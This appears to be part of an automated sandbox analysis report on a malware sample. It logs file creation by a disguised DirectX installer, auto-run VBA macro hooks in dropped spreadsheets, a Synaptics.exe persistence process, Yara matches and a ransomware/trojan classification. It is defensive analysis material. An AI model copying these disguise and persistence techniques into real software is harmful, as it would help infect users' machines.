                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_xinput_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C300B.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C300B.tmp\Aug2006_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2006_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C353B.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C353B.tmp\Aug2006_xinput_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2006_xinput_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C3A9A.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C3A9A.tmp\Dec2006_d3dx10_00_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_d3dx10_00_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C4047.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C4047.tmp\Dec2006_d3dx10_00_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_d3dx10_00_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C4643.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C4643.tmp\Apr2007_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C4B82.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C4B82.tmp\Apr2007_xinput_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_xinput_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C516E.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C516E.tmp\Feb2005_d3dx9_24_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2005_d3dx9_24_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C59BB.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C59BB.tmp\Apr2005_d3dx9_25_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2005_d3dx9_25_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C639E.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C639E.tmp\Jun2005_d3dx9_26_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2005_d3dx9_26_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C6D43.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C6D43.tmp\Aug2005_d3dx9_27_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2005_d3dx9_27_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C75FD.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C75FD.tmp\Dec2005_d3dx9_28_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2005_d3dx9_28_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C7F92.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C7F92.tmp\Feb2006_d3dx9_29_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2006_d3dx9_29_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C883D.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C883D.tmp\Apr2006_d3dx9_30_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_d3dx9_30_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C92CC.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C92CC.tmp\Oct2006_d3dx9_31_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Oct2006_d3dx9_31_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C9C42.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6C9C42.tmp\Dec2006_d3dx9_32_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_d3dx9_32_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CA606.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CA606.tmp\Apr2007_d3dx9_33_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_d3dx9_33_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CB038.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CB038.tmp\Apr2007_d3dx10_33_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_d3dx10_33_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CB74C.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CB74C.tmp\Jun2007_d3dx9_34_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_d3dx9_34_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CC1DB.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CC1DB.tmp\Jun2007_d3dx10_34_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_d3dx10_34_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CCA19.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CCA19.tmp\Aug2007_d3dx9_35_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2007_d3dx9_35_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CD563.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CD563.tmp\Aug2007_d3dx10_35_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2007_d3dx10_35_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CDD52.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CDD52.tmp\Nov2007_d3dx9_36_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2007_d3dx9_36_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CE7D2.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CE7D2.tmp\Nov2007_d3dx10_36_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2007_d3dx10_36_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CEF92.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CEF92.tmp\Mar2008_d3dx9_37_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2008_d3dx9_37_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CFCA2.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CFCA2.tmp\Mar2008_d3dx10_37_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2008_d3dx10_37_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D04A1.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D04A1.tmp\Jun2008_d3dx9_38_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2008_d3dx9_38_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D0EA3.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D0EA3.tmp\Jun2008_d3dx10_38_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2008_d3dx10_38_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D176D.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D176D.tmp\Aug2008_d3dx9_39_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2008_d3dx9_39_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D21AE.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D21AE.tmp\Aug2008_d3dx10_39_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2008_d3dx10_39_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D2A0B.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D2A0B.tmp\Nov2008_d3dx9_40_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2008_d3dx9_40_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D3527.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D3527.tmp\Nov2008_d3dx10_40_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2008_d3dx10_40_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D3EDB.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D3EDB.tmp\Mar2009_d3dx9_41_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2009_d3dx9_41_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D498A.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D498A.tmp\Mar2009_d3dx10_41_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2009_d3dx10_41_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D5244.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D5244.tmp\Aug2009_d3dx9_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_d3dx9_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D59F5.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D59F5.tmp\Aug2009_d3dx10_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_d3dx10_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D5FE0.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D5FE0.tmp\Aug2009_d3dx11_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_d3dx11_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D659D.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6D659D.tmp\Aug2009_d3dcsx_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile deleted: C:\Windows\SysWOW64\directx\websetup\SET8E7C.tmpJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01007E022_2_01007E02
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100791E2_2_0100791E
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100878E2_2_0100878E
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010080E22_2_010080E2
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: zsbKktb3.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: GLTYDMDUST.xlsm.4.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 15608
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: ._cache_file.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 220645 bytes, 5 files, at 0x2c "dsetup.dll" "dsetup32.dll", ID 5930, number 1, 75 datablocks, 0x1503 compression
                          Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: RCX8506.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: ~$cache1.4.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: file.exe, 00000000.00000000.1251603330.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exe, 00000000.00000000.1251603330.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                          Source: file.exe, 00000000.00000003.1264979819.00000000006F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                          Source: file.exe, 00000000.00000003.1266324483.00000000006AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameM vs file.exe
                          Source: file.exe, 00000000.00000003.1266324483.00000000006AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs file.exe
                          Source: file.exe, 00000000.00000003.1265937265.00000000006FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                          Source: file.exe, 00000000.00000003.1262015458.0000000003F71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exe, 00000000.00000003.1264938493.0000000002260000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                          Source: file.exe, 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwsetup.exeh$ vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwsetup.exe` vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwsetup.exed! vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwsetup.exel% vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwsetup.exep( vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsetup32.dllh$ vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsetup32.dll` vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsetup32.dlld! vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsetup32.dllp' vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsetup32.dllx, vs file.exe
                          Source: file.exeBinary or memory string: OriginalFileName vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameb! vs file.exe
                          Source: ._cache_file.exe.0.drBinary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: classification engineClassification label: mal74.rans.troj.expl.winEXE@16/214@14/3
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01003F0D lstrcpyA,GetCurrentDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,GetLastError,FormatMessageA,GetVolumeInformationA,GetLastError,FormatMessageA,SetCurrentDirectoryA,SetCurrentDirectoryA,lstrcpynA,2_2_01003F0D
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010018B5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,2_2_010018B5
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01005E67 GetDiskFreeSpaceA,SetCurrentDirectoryA,MulDiv,2_2_01005E67
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01004C18 CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceA,LoadResource,#17,2_2_01004C18
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\._cache_file.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeMutant created: \Sessions\1\BaseNamedObjects\DSETUP32 DLL Mutex
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeMutant created: \Sessions\1\BaseNamedObjects\DXWSETUP
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeMutant created: \Sessions\1\BaseNamedObjects\DXUPDATE DLL Mutex
                          Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeMutant created: \Sessions\1\BaseNamedObjects\DSETUP DLL Mutex
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4136
                          Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMPJump to behavior
                          Source: Yara matchFile source: file.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
